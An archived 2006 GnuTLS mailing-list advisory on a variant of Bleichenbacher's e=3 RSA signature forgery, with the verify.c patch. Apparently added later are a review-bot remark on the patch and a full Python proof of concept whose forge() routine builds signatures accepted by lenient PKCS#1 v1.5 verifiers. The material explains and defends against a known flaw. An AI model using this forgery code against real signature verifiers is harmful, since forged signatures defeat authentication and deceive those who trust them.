[Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack


From: Simon Josefsson
Subject: [Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack
Date: Fri, 08 Sep 2006 17:44:13 +0200
User-agent: Gnus/5.110006 (No Gnus v0.6) Emacs/22.0.50 (gnu/linux)

The GNUTLS-SA-2006-4 security problem (fixed in 1.4.3) is a variant of
Bleichenbacher's latest attack:

http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html

The difference is that it uses the digestAlgorithm.parameters field to
store "garbage", instead of placing it after the ASN.1 blob.  The optional
parameters field is not used for MD5/SHA1, but instead of verifying
that the field is not present, GnuTLS just ignored it.  Therefore, it
can be used to store garbage data.

This problem was reported to us by Yutaka Oiwa, Kazukuni Kobara,
Hajime Watanabe and hopefully their original report with more
background will be available soon.

The patch that fixes this is for lib/x509/verify.c, see below.

This has been installed on the GnuTLS 1.5 branch, but I don't intend
to release 1.5.1 soon.  Try the nightly snapshots, or 1.4.3 instead.

/Simon

Update of /cvs/gnutls/gnutls/lib/x509
In directory trithemius:/tmp/cvs-serv3577

Modified Files:
      Tag: gnutls_1_4_x
        verify.c 
Log Message:
Make sure the digestAlgorithm.parameters field is empty, which it has
to be for the hashes we support.  Otherwise, the field can encode
"garbage" that might be used to make the signature be a perfect cube,
similar (but not identical) to Bleichenbacher's Crypto 06 rump session
attack.

--- /cvs/gnutls/gnutls/lib/x509/verify.c        2005/11/07 23:28:02     1.52
+++ /cvs/gnutls/gnutls/lib/x509/verify.c        2006/09/08 13:38:55     1.52.2.1
 <at>  <at>  -1,5 +1,5  <at>  <at> 
 /*
- * Copyright (C) 2003, 2004, 2005 Free Software Foundation
+ * Copyright (C) 2003, 2004, 2005, 2006 Free Software Foundation
  *
  * Author: Nikos Mavroyanopoulos
  *
 <at>  <at>  -505,6 +505,15  <at>  <at> 
       return GNUTLS_E_UNKNOWN_HASH_ALGORITHM;
     }

+  len = sizeof (str) - 1;
+  result = asn1_read_value (dinfo, "digestAlgorithm.parameters", NULL, &len);
+  if (result != ASN1_ELEMENT_NOT_FOUND)
+    {
+      gnutls_assert ();
+      asn1_delete_structure (&dinfo);
+      return _gnutls_asn2err (result);
+    }
+
   result = asn1_read_value (dinfo, "digest", digest, digest_size);
   if (result != ASN1_SUCCESS)
     {
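Review bot: the test `if (result != ASN1_ELEMENT_NOT_FOUND)` accepts only an absent parameters field, so a DigestInfo whose parameters are an explicit NULL (the two bytes 05 00), which RFC 3447 section 9.2 prescribes for MD5 and SHA-1 and which most signers emit, will now fail with the asn2err error instead of verifying. Suggest reading the field into `str` (the buffer `len` is already sized for) and accepting exactly 05 00 alongside ASN1_ELEMENT_NOT_FOUND, rejecting any other length or content; that still closes the garbage channel while keeping NULL-parameter signatures valid. A short comment stating that any return other than ASN1_ELEMENT_NOT_FOUND means the element is present (the read passes a NULL buffer, so the value itself is never copied) would make the intent of the check clear to the next reader.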

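The forgery Simon describes, worked through as an added example; this is not code from GnuTLS or from the original report, and every function name in it is the example's own. It contains a pure-Python PKCS#1 v1.5 EM checker with a lenient mode (a present parameters field is parsed but its content ignored, as in GnuTLS before 1.4.3) and a strict mode (parameters absent or NULL, the intent of the verify.c patch), plus the e=3 forgery: the free bits live inside an OCTET STRING in digestAlgorithm.parameters, the fixed prefix is hit by an integer cube root, and the fixed trailing hash bytes are hit by a cube root modulo 2^t. The modulus N is a constructed 3072-bit odd number standing in for any e=3 public key; the attack never needs the factors, only the key size, since the forged cube never wraps modulo N. Requires Python 3.8 or later for the modular inverse via pow().

```python
"""Added example, not GnuTLS code: e=3 PKCS#1 v1.5 forgery with the free
bits inside digestAlgorithm.parameters, checked against a lenient and a
strict verifier.  All helper names are hypothetical.  Python >= 3.8."""
import hashlib
import random

SHA1_OID = bytes.fromhex("2b0e03021a")  # 1.3.14.3.2.26, id-sha1
NULL_PARAMS = b"\x05\x00"


def der(tag, body):
    """Encode one DER TLV with a definite short- or long-form length."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def der_read(buf, pos=0):
    """Decode the TLV at buf[pos:]; return (tag, body, offset after it)."""
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        cnt = n & 0x7F
        if not 1 <= cnt <= 4:
            raise ValueError("bad length")
        n, pos = int.from_bytes(buf[pos:pos + cnt], "big"), pos + cnt
    if pos + n > len(buf):
        raise ValueError("truncated")
    return tag, buf[pos:pos + n], pos + n


def digest_info(h, params=b""):
    """DigestInfo ::= SEQUENCE { SEQUENCE { OID, params }, OCTET STRING h }"""
    return der(0x30, der(0x30, der(0x06, SHA1_OID) + params) + der(0x04, h))


def emsa_pkcs1_v15(h, k, params=b""):
    """EM = 00 01 || PS (0xff bytes, fills to k) || 00 || DigestInfo."""
    t = digest_info(h, params)
    return b"\x00\x01" + b"\xff" * (k - 3 - len(t)) + b"\x00" + t


def check_em(em, h, strict):
    """Parse EM like a verifier.  Both modes reject bytes after the DigestInfo
    (the original 2006 trick); only strict mode limits the parameters field
    to absent or NULL, which is what the 1.4.3 fix adds."""
    try:
        if em[:2] != b"\x00\x01":
            return False
        i = 2
        while i < len(em) and em[i] == 0xFF:
            i += 1
        if i - 2 < 8 or i >= len(em) or em[i] != 0:
            return False
        t = em[i + 1:]
        tag, body, end = der_read(t)
        if tag != 0x30 or end != len(t):
            return False
        tag, alg, p = der_read(body)
        if tag != 0x30:
            return False
        tag, digest, q = der_read(body, p)
        if tag != 0x04 or q != len(body):
            return False
        tag, oid, r = der_read(alg)
        if tag != 0x06 or oid != SHA1_OID:
            return False
        params = alg[r:]
        if params and der_read(params)[2] != len(params):
            return False  # lenient: one well-formed element, content ignored
        if strict and params not in (b"", NULL_PARAMS):
            return False
        return digest == h
    except (ValueError, IndexError):
        return False


def verify(n, e, sig, msg, strict):
    k = (n.bit_length() + 7) // 8
    em = pow(sig, e, n).to_bytes(k, "big")
    return check_em(em, hashlib.sha1(msg).digest(), strict)


def icbrt(n):
    """Floor of the integer cube root, Newton's method on integers."""
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def forge(k, msg_base):
    """Return (sig, msg): sig**3 < 2**(8k-15), so it verifies under ANY k-byte
    e=3 modulus whose verifier ignores the parameters content."""
    for ctr in range(256):  # the 2-adic cube root needs an odd final hash byte
        msg = msg_base + b" #%d" % ctr
        h = hashlib.sha1(msg).digest()
        if h[-1] & 1:
            break
    g = next(g for g in range(k, 0, -1)
             if len(digest_info(h, der(0x04, bytes(g)))) <= k - 11)
    em = emsa_pkcs1_v15(h, k, der(0x04, bytes(g)))  # zero bytes = free bytes
    sl = len(der(0x04, h))
    prefix, suffix = em[:k - sl - g], em[k - sl:]
    assert em[k - sl - g:k - sl] == bytes(g)
    P, S = int.from_bytes(prefix, "big"), int.from_bytes(suffix, "big")
    t, L = 8 * sl, 8 * (g + sl)
    b = pow(S, pow(3, -1, 1 << (t - 1)), 1 << t)  # b**3 == S (mod 2**t)
    r = icbrt((P << L) + (1 << (L - 1)))          # r**3 in the middle of the band
    s = ((r >> t) << t) | b                        # splice in the low bits
    assert (P << L) <= s ** 3 < ((P + 1) << L)     # prefix bytes survive
    return s, msg


# Constructed stand-in for a 3072-bit, e=3 public modulus; any one would do.
N = random.Random(7).getrandbits(3072) | (1 << 3071) | 1

if __name__ == "__main__":
    sig, msg = forge(384, b"constructed message")
    print("lenient:", verify(N, 3, sig, msg, strict=False))  # True
    print("strict: ", verify(N, 3, sig, msg, strict=True))   # False
```

The garbage here is an OCTET STRING so that a libtasn1-style ANY OPTIONAL parser sees one well-formed element; the splice works because the low t bits of s^3 depend only on the low t bits of s, while replacing them moves s^3 by far less than the 2^L-wide band that keeps the prefix bytes fixed.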